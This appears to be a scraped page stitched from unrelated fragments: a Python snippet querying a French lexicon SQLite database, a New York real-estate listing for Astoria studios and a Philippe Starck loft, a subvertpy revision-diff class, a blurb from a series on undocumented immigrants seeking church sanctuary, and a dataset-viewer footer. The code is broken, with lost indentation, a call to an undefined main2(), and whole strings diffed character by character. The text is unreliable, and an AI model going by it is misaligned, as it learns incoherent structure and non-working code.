import sqlite3
with sqlite3.connect("Lexique.db") as conn:
cursor = conn.cursor()
cursor.execute("SELECT * FROM Lexique where ortho = ?", ("vingt",))
print(cursor.fetchone())
if __name__ == '__main__':
main2()
|
New York Squared has four beautiful studios available in Astoria, blocks away from the N/W train, and only recently constructed. The building is less than a year old and all utilities are included. The apartments also feature private outdoor space and a gorgeous rooftop with 360 degree views of all of New York. Impress your guests with a private party on the rooftop! Other amenities include private storage, gym and a laundry room. Private (indoor and outdoor) parking is available, but not included in the rent. These units are going for $1,800!!!
Loft in Downtown Philippe Starck Building Rented!!!
New York Squared recently rented a beautiful apartment in the renown Financial District building 15 Broad Street, designed by the highly acclaimed Philippe Starck.
The sunny 700 square foot loft included an open kitchen, custom closets, a semi-enclosed bedroom and a built-in office.
The new resident will enjoy amenities including a Health Club, Swimming Pool, Sauna, Jacuzzi, Children’s Playroom, Yoga/Ballet Studio, Indoor Basketball Court, Squash Court, Business Center, Bowling Alley, Screening Room and open-air Floor Park.
Looking for something similar? Contact NY2 so we can assist you in finding your next home.
|
import os
from difflib import Differ
from pprint import pprint
from subvertpy import repos, ra, NODE_DIR, NODE_FILE
class RevisionDiff(object):
""" The set of changes needed to transform one revision into another """
def __init__(self, revision1=None, revision2=None):
super(RevisionDiff, self).__init__()
self._rev1 = revision1
self._rev2 = revision2
self.ra_api = self._rev2.get_ra_api()
def get_value(self):
"""Concatenation of Unified Diffs of resources between the revisions."""
# getting the revision id of the element to be diffed.
self.rev1_num = self._rev1.properties.revision_id
self.rev2_num = self._rev2.properties.revision_id
resource1 = str(self._rev1.get_resource().data)
resource2 = str(self._rev2.get_resource().data)
differ = Differ()
result = list(differ.compare(resource1, resource2))
return ''.join(result)
value = property(get_value)
|
For the undocumented mother of three, taking sanctuary in a church seemed the best way to keep her family together.
Read all of the episodes in the Finding Sanctuary series.
Cinthya Santos BrionesCinthya Santos Briones is a Mexican documentary photographer and photojournalist based in New York City.
Malav KanugaMalav Kanuga is an urban anthropologist and founding editor of Common Notions.
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.